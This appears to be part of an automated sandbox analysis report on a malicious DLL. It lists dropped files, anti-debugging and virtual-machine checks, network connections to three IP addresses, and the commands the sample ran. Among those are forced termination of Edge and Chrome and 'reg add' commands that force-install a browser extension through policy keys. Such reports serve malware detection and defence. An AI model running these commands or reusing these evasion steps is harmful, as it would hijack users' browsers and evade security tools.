Source: C:\Windows\SysWOW64\rundll32.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_NetworkAdapter WHERE DeviceID = 1
Source: C:\Windows\SysWOW64\rundll32.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_NetworkAdapterConfiguration WHERE Index = 1
Source: C:\Windows\SysWOW64\rundll32.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_NetworkAdapterConfiguration WHERE IPEnabled = True
Source: C:\Windows\SysWOW64\rundll32.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_NetworkAdapter WHERE DeviceID = 1
Source: C:\Windows\SysWOW64\rundll32.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_NetworkAdapterConfiguration WHERE Index = 1
Source: C:\Windows\SysWOW64\rundll32.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : Select * from Win32_NetworkAdapter Where NetEnabled=TRUE
Source: C:\Windows\SysWOW64\rundll32.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_NetworkAdapterConfiguration WHERE IPEnabled = True
Source: C:\Windows\SysWOW64\rundll32.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_NetworkAdapter WHERE DeviceID = 1
Source: C:\Windows\SysWOW64\rundll32.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_NetworkAdapterConfiguration WHERE Index = 1
Source: C:\Windows\SysWOW64\rundll32.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_NetworkAdapterConfiguration WHERE IPEnabled = True
Source: C:\Windows\SysWOW64\rundll32.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_NetworkAdapter WHERE DeviceID = 1
Source: C:\Windows\SysWOW64\rundll32.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_NetworkAdapterConfiguration WHERE Index = 1
Source: C:\Windows\System32\svchost.exe System information queried: FirmwareTableInformation
Source: C:\Windows\System32\svchost.exe File opened / queried: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: C:\Windows\SysWOW64\rundll32.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsqF009.tmp\MoreInfo.dll
Source: C:\Windows\SysWOW64\rundll32.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nszFA3A.tmp\md5dll.dll
Source: C:\Windows\SysWOW64\rundll32.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nssF49D.tmp\nsExec.dll
Source: C:\Windows\SysWOW64\rundll32.exe Dropped PE file which has not been started: C:\Program Files (x86)\Wimsys\uninstall.exe
Source: C:\Windows\SysWOW64\rundll32.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nssF49D.tmp\SimpleSC.dll
Source: C:\Windows\SysWOW64\rundll32.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsqF009.tmp\System.dll
Source: C:\Windows\SysWOW64\rundll32.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nssF49D.tmp\MoreInfo.dll
Source: C:\Windows\SysWOW64\rundll32.exe Dropped PE file which has not been started: C:\Program Files (x86)\Wimsys\msg.exe
Source: C:\Windows\SysWOW64\rundll32.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nszFA3A.tmp\IpConfig.dll
Source: C:\Windows\SysWOW64\rundll32.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nssF49D.tmp\IpConfig.dll
Source: C:\Windows\SysWOW64\rundll32.exe Dropped PE file which has not been started: C:\Users\Public\wss_tmp\cr_ws_2.dll
Source: C:\Windows\SysWOW64\rundll32.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nszFA3A.tmp\inetc.dll
Source: C:\Windows\SysWOW64\rundll32.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nszFA3A.tmp\System.dll
Source: C:\Windows\SysWOW64\rundll32.exe Dropped PE file which has not been started: C:\Users\Public\fbe\fbegbhf.dll
Source: C:\Windows\SysWOW64\rundll32.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nszFA3A.tmp\MoreInfo.dll
Source: C:\Windows\SysWOW64\rundll32.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nssF49D.tmp\md5dll.dll
Source: C:\Windows\SysWOW64\rundll32.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nszFA3A.tmp\SimpleSC.dll
Source: C:\Windows\SysWOW64\rundll32.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsqF009.tmp\inetc.dll
Source: C:\Windows\SysWOW64\rundll32.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nssF49D.tmp\System.dll
Source: C:\Windows\SysWOW64\rundll32.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsqF009.tmp\IpConfig.dll
Source: C:\Windows\SysWOW64\rundll32.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsqF009.tmp\nsExec.dll
Source: C:\Windows\SysWOW64\rundll32.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsqF009.tmp\md5dll.dll
Source: C:\Windows\SysWOW64\rundll32.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsqF009.tmp\SimpleSC.dll
Source: C:\Windows\SysWOW64\rundll32.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nssF49D.tmp\inetc.dll
Source: C:\Windows\SysWOW64\rundll32.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nszFA3A.tmp\nsExec.dll
Source: C:\Windows\SysWOW64\rundll32.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Windows\System32\rundll32.exe API coverage: 4.0 %
Source: C:\Windows\System32\rundll32.exe API coverage: 7.6 %
Source: C:\Windows\System32\rundll32.exe API coverage: 1.9 %
Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\svchost.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\svchost.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\svchost.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\svchost.exe File Volume queried: C:\Windows\System32 FullSizeInformation
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046A4C6B lstrcpynW,FindFirstFileW, 6_2_046A4C6B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046A30A4 FindFirstFileW,FindClose, 6_2_046A30A4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046A2367 DeleteFileW,lstrcpynW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,lstrcpynW,FindNextFileW,FindClose, 6_2_046A2367
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046C548A FindFirstFileExW, 6_2_046C548A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046B3A83 GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,___std_fs_open_handle@16,GetFileInformationByHandleEx,GetLastError,GetFileInformationByHandleEx,GetFileInformationByHandleEx, 6_2_046B3A83
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_045E4C6B lstrcpynW,FindFirstFileW, 7_2_045E4C6B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_045E30A4 FindFirstFileW,FindClose, 7_2_045E30A4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_045E2367 DeleteFileW,lstrcpynW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,lstrcpynW,FindNextFileW,FindClose, 7_2_045E2367
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0460548A FindFirstFileExW, 7_2_0460548A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_045F3A83 GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,___std_fs_open_handle@16,GetFileInformationByHandleEx,GetLastError,GetFileInformationByHandleEx,GetFileInformationByHandleEx, 7_2_045F3A83
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_03452367 DeleteFileW,lstrcpynW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,lstrcpynW,FindNextFileW,FindClose, 15_2_03452367
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_034530A4 FindFirstFileW,FindClose, 15_2_034530A4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_03454C6B lstrcpynW,FindFirstFileW, 15_2_03454C6B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_03463A83 GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,___std_fs_open_handle@16,GetFileInformationByHandleEx,GetLastError,GetFileInformationByHandleEx,GetFileInformationByHandleEx, 15_2_03463A83
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0347548A FindFirstFileExW, 15_2_0347548A
Source: C:\Windows\System32\rundll32.exe Code function: 33_2_0000021BD943F81C FindFirstFileExA, 33_2_0000021BD943F81C
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000166D885F81C FindFirstFileExA, 34_2_00000166D885F81C
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C66F0510 FindFirstFileExW, 39_2_000001C9C66F0510
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C85CAC90 __doserrno,_errno,_invalid_parameter_noinfo,_errno,__doserrno,_getdrive,FindFirstFileExW,_errno,_errno,_wfullpath,_errno,_errno,_errno,_wfullpath,IsRootUNCName,GetDriveTypeW,free,__loctotime64_t,free,_wsopen_s,_fstat64,_close,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,__loctotime64_t,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,__loctotime64_t,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,__loctotime64_t,FindClose,__wdtoxmode,GetLastError,_dosmaperr,FindClose,GetLastError,_dosmaperr,FindClose, 39_2_000001C9C85CAC90
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 120000
Source: rundll32.exe, 0000000F.00000002.1529325871.000000000320A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: wod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-)
Source: svchost.exe, 0000000A.00000002.3167280672.0000019AED07F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: svchost.exe, 0000000A.00000002.3166441898.0000019AED02B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: (@\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: rundll32.exe, 00000006.00000002.1532997737.0000000004D23000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWo
Source: rundll32.exe, 00000006.00000002.1532068572.0000000002DFA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWe
Source: rundll32.exe, 00000006.00000002.1532289168.0000000002EBB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1531203206.0000000002EBB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.1532997737.0000000004D23000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.1508449489.0000000004CC8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000002.1529987679.00000000052A0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: svchost.exe, 0000000A.00000002.3165369436.0000019AED002000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
Source: rundll32.exe, 00000006.00000002.1532289168.0000000002ECF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{5=J
Source: svchost.exe, 0000000A.00000002.3167552753.0000019AED08C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: rundll32.exe, 0000000F.00000003.1529014689.0000000003255000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000002.1529379708.0000000003255000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWPs,
Source: rundll32.exe, 00000007.00000003.1506478813.0000000002D8E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.1507666527.0000000002D8E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW@
Source: svchost.exe, 0000000A.00000002.3167280672.0000019AED064000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: (@SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000es
Source: svchost.exe, 00000008.00000002.3166386079.00000257B862B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000003.1349624943.000000000323D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000003.1369333981.000000000323D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046B4F9B IsDebuggerPresent,OutputDebugStringW, 6_2_046B4F9B
Source: C:\Windows\System32\rundll32.exe Code function: 33_2_0000021BD9797C80 EncodePointer,__crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 33_2_0000021BD9797C80
Source: C:\Windows\System32\rundll32.exe Code function: 33_2_0000021BD9431090 VirtualAlloc,VirtualProtect,LoadLibraryA,GetProcAddress, 33_2_0000021BD9431090
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046C1C29 mov eax, dword ptr fs:[00000030h] 6_2_046C1C29
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046BB6DE mov ecx, dword ptr fs:[00000030h] 6_2_046BB6DE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_02E57444 mov eax, dword ptr fs:[00000030h] 6_2_02E57444
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_04601C29 mov eax, dword ptr fs:[00000030h] 7_2_04601C29
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_045FB6DE mov ecx, dword ptr fs:[00000030h] 7_2_045FB6DE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_02D27364 mov eax, dword ptr fs:[00000030h] 7_2_02D27364
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0346B6DE mov ecx, dword ptr fs:[00000030h] 15_2_0346B6DE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_03471C29 mov eax, dword ptr fs:[00000030h] 15_2_03471C29
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_032673E4 mov eax, dword ptr fs:[00000030h] 15_2_032673E4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046C6017 GetProcessHeap, 6_2_046C6017
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046B4D53 SetUnhandledExceptionFilter, 6_2_046B4D53
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046B406B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 6_2_046B406B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046B4BC0 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 6_2_046B4BC0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046B8BB3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 6_2_046B8BB3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_6D4BDE7D IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 6_2_6D4BDE7D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_6D4BE069 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 6_2_6D4BE069
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_045F4D53 SetUnhandledExceptionFilter, 7_2_045F4D53
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_045F406B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 7_2_045F406B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_045F4BC0 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 7_2_045F4BC0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_045F8BB3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 7_2_045F8BB3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_03464BC0 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 15_2_03464BC0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_03468BB3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 15_2_03468BB3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0346406B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 15_2_0346406B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_03464D53 SetUnhandledExceptionFilter, 15_2_03464D53
Source: C:\Windows\System32\rundll32.exe Code function: 33_2_0000021BD943A208 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 33_2_0000021BD943A208
Source: C:\Windows\System32\rundll32.exe Code function: 33_2_0000021BD943D5D0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 33_2_0000021BD943D5D0
Source: C:\Windows\System32\rundll32.exe Code function: 33_2_0000021BD94460F8 SetUnhandledExceptionFilter, 33_2_0000021BD94460F8
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000166D88660F8 SetUnhandledExceptionFilter, 34_2_00000166D88660F8
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000166D885D5D0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 34_2_00000166D885D5D0
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000166D885A208 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 34_2_00000166D885A208
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C66E86AC IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 39_2_000001C9C66E86AC
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C66EDC78 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 39_2_000001C9C66EDC78
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C66F8100 SetUnhandledExceptionFilter, 39_2_000001C9C66F8100
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C85BE1FC SetUnhandledExceptionFilter,UnhandledExceptionFilter,UnhandledExceptionFilter, 39_2_000001C9C85BE1FC
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C85E6410 SetUnhandledExceptionFilter, 39_2_000001C9C85E6410

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 172.67.207.72 443
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 138.199.40.58 80
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 104.21.24.192 80
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046AC780 GetCurrentDirectoryW,GetModuleFileNameW,ShellExecuteExW,GetLastError,WaitForSingleObject,GetExitCodeProcess,CloseHandle, 6_2_046AC780
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\anuwhqTXGt.dll",#1
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\taskkill.exe TaskKill /IM msedge.exe
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\taskkill.exe TaskKill /IM chrome.exe
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\reg.exe reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Edge\ExtensionInstallForcelist /v 1 /t REG_SZ /d liffkepbndfkkknedglekeghaegocokk;file:///C:/Windows/Installer/{f4b964cf-1b7a-aa88-03cb-3533f33b6987}/c23a32abd836342a70b7f6c1aa74947e.2.E /reg:32
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\reg.exe reg add HKEY_LOCAL_MACHINE\Software\Policies\Google\Chrome\ExtensionInstallForcelist /v 1 /t REG_SZ /d liffkepbndfkkknedglekeghaegocokk;file:///C:/Windows/Installer/{f4b964cf-1b7a-aa88-03cb-3533f33b6987}/c23a32abd836342a70b7f6c1aa74947e.2 /reg:32
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 "C:\Users\Public\wss_tmp\cr_ws_2.dll" main --install-run
Source: C:\Windows\SysWOW64\rundll32.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\rundll32.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\rundll32.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\rundll32.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\taskkill.exe TaskKill /IM msedge.exe
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\taskkill.exe TaskKill /IM chrome.exe
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 "C:\Users\Public\wss_tmp\cr_ws_2.dll" main --install-run
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 "C:\Users\Public\fbe\fbegbhf.dll" main -c uninstall
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 "C:\Users\Public\fbe\fbegbhf.dll" main -c install-run
Source: C:\Windows\SysWOW64\rundll32.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\taskkill.exe TaskKill /IM msedge.exe
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\taskkill.exe TaskKill /IM chrome.exe
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 "C:\Users\Public\wss_tmp\cr_ws_2.dll" main --install-run
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 "C:\Users\Public\fbe\fbegbhf.dll" main -c uninstall
Source: C:\Windows\SysWOW64\rundll32.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\rundll32.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\rundll32.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\taskkill.exe TaskKill /IM msedge.exe
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\taskkill.exe TaskKill /IM chrome.exe
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\taskkill.exe TaskKill /IM msedge.exe
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\taskkill.exe TaskKill /IM chrome.exe
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\taskkill.exe TaskKill /IM msedge.exe
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\taskkill.exe TaskKill /IM chrome.exe
Source: C:\Windows\System32\rundll32.exe Code function: 33_2_0000021BD97888C0 OpenEventW,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateEventW, 33_2_0000021BD97888C0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046AC8E0 AllocateAndInitializeSid,CheckTokenMembership,GetLastError,FreeSid, 6_2_046AC8E0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046B499C cpuid 6_2_046B499C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoW, 6_2_046C8549
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 6_2_046C8672
Source: C:\Windows\SysWOW64\rundll32.exe Code function: EnumSystemLocalesW, 6_2_046C265B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetACP,IsValidCodePage,GetLocaleInfoW, 6_2_046C7EE3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoW, 6_2_046C8778
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 6_2_046C8847
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoEx,FormatMessageA, 6_2_046B30F7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: EnumSystemLocalesW, 6_2_046C81D0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: EnumSystemLocalesW, 6_2_046C8185
Source: C:\Windows\SysWOW64\rundll32.exe Code function: EnumSystemLocalesW, 6_2_046C826B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 6_2_046C82F6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoW, 6_2_046C2B05
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoW, 7_2_04608549
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 7_2_04608672
Source: C:\Windows\SysWOW64\rundll32.exe Code function: EnumSystemLocalesW, 7_2_0460265B
